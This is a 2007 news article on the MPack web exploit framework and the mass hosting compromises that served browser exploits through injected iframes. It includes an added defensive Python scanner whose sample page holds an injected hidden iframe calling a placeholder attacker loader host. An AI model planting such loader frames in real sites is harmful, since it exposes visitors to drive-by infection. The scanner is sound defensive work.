New Web Attack Platform Draws Attention
When attackers single out websites for attack, whether to deface them, infect their visitors, or extract sensitive data from them, there are a number of readily available tools that automate the process. One recently created tool is being linked to a number of very significant website attacks in which legitimate sites were made to serve malicious content to their visitors. In just one case, more than 10,000 sites were affected when an Italian ISP was attacked. Other hosting compromises (such as the one at DreamHost) are not being made as public, even though the damage to the sites they host is still significant.
More an exploit framework (in the vein of Metasploit) built in PHP than a single exploit, the attack tool, dubbed MPack, gives the attacker a number of choices not only in how the exploit loader is placed on the compromised websites, but also in which exploits those sites then try to load in visitors' browsers. The most widespread combination being observed at the moment is an IFRAME injected into the homepage of affected sites; the frame calls back to an attacker-controlled server, which attempts to load a range of exploits derived from previously released public exploit code.
Significantly, the victim won't notice any difference in their online experience with an affected site, making it harder for the casual web surfer to identify that something has gone wrong.
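The pattern described above, a hidden IFRAME injected into a legitimate page that points at an attacker-controlled server, is also something a hosting provider or site owner can look for in their own pages. The following is an added example, not code from the article or from MPack: a small Python scanner that flags iframes which both point off-site and are hidden from the visitor. The sample page, the site host "www.victim.example" and the loader host "loader.example" are constructed placeholders.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


class IframeCollector(HTMLParser):
    """Collect every <iframe> start tag and its attributes from an HTML document."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            # Attribute values may be None for bare attributes; normalise to "".
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def _is_tiny(value):
    """True for width/height values that make the frame effectively invisible (0 or 1 px)."""
    m = re.match(r"\s*(\d+)", value or "")
    return m is not None and int(m.group(1)) <= 1


def suspicious_iframes(html, site_host):
    """Return the iframes in `html` that look like an injected exploit loader.

    A frame is flagged when it points at a host other than the site's own AND is
    hidden from the visitor (0/1 pixel size, or display:none / visibility:hidden in
    its inline style). A relative src has no host and is treated as same-site.
    """
    collector = IframeCollector()
    collector.feed(html)
    findings = []
    for attrs in collector.iframes:
        src = attrs.get("src", "")
        host = urlparse(src).hostname or site_host
        off_site = host.lower() != site_host.lower()
        style = attrs.get("style", "").lower().replace(" ", "")
        hidden = (
            _is_tiny(attrs.get("width"))
            or _is_tiny(attrs.get("height"))
            or "display:none" in style
            or "visibility:hidden" in style
        )
        if off_site and hidden:
            findings.append({"src": src, "host": host, "hidden": True})
    return findings


# Constructed sample page (not a real compromised site): a legitimate, visible
# video embed, a hidden same-site frame, and an injected hidden loader frame of the
# kind the article describes. "loader.example" is a placeholder for the attacker's host.
SAMPLE_PAGE = """<html><body>
<h1>Welcome</h1>
<iframe src="http://video.example/embed/42" width="480" height="360"></iframe>
<iframe src="/ads/banner.html" width="0" height="0"></iframe>
<iframe src="http://loader.example/in.cgi?3" width="0" height="0"
        style="visibility: hidden"></iframe>
</body></html>"""


if __name__ == "__main__":
    for finding in suspicious_iframes(SAMPLE_PAGE, "www.victim.example"):
        print("injected loader frame:", finding["src"])
```

Treat this as a triage heuristic rather than a verdict: a visible off-site frame can also be malicious, and attackers can obfuscate the injection with script rather than a literal IFRAME tag, so the stronger check for a hosting provider is to diff served pages against a known-good copy of each customer's files.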
With included exploits targeting core Microsoft Windows vulnerabilities, WinZip ActiveX controls, QuickTime, and a number of other components, MPack is a significant threat to anybody who goes online without an up-to-date system.
The use of mass webhost compromises to spread the impact of an attack neatly bypasses the so-called 'protection' that blacklists of known phishing and malware sites claim to provide: a legitimate site that has just been compromised is not on any list. It also means that the advice to only visit trusted sites doesn't hold up when the hosting provider is attacked and ALL of the sites it hosts are compromised.
While it is unfortunate and costly that such a large number of websites have been affected so quickly, it is an excellent example of the shortcomings of antiphishing and antimalware initiatives (such as SiteAdvisor) that try to ascertain the safety of a website before the potential victim visits it. The risk of a site being improperly classified has also increased significantly with these attacks, more so for hosting providers who are not rigorous with their server maintenance and administration.
Researchers at iDefense have tied the emergence of MPack to a group of Russian criminals who have previously been linked to '0-day' cPanel exploits (also believed to be relevant to how the servers in this set of attacks are being compromised) and to other malicious online activity. The cPanel issues were in fact known before the exploits appeared, though not by very long.
With the rapid spread of affected sites, and the 'anti-malware' vendors caught flat-footed or unable to adequately address the threat, it appears that many victims are already succumbing to the exploits that load when they visit an affected site. iDefense researchers indicate that more than 80,000 victims were discovered following just one attack (the number of affected sites was not mentioned).
22 June 2007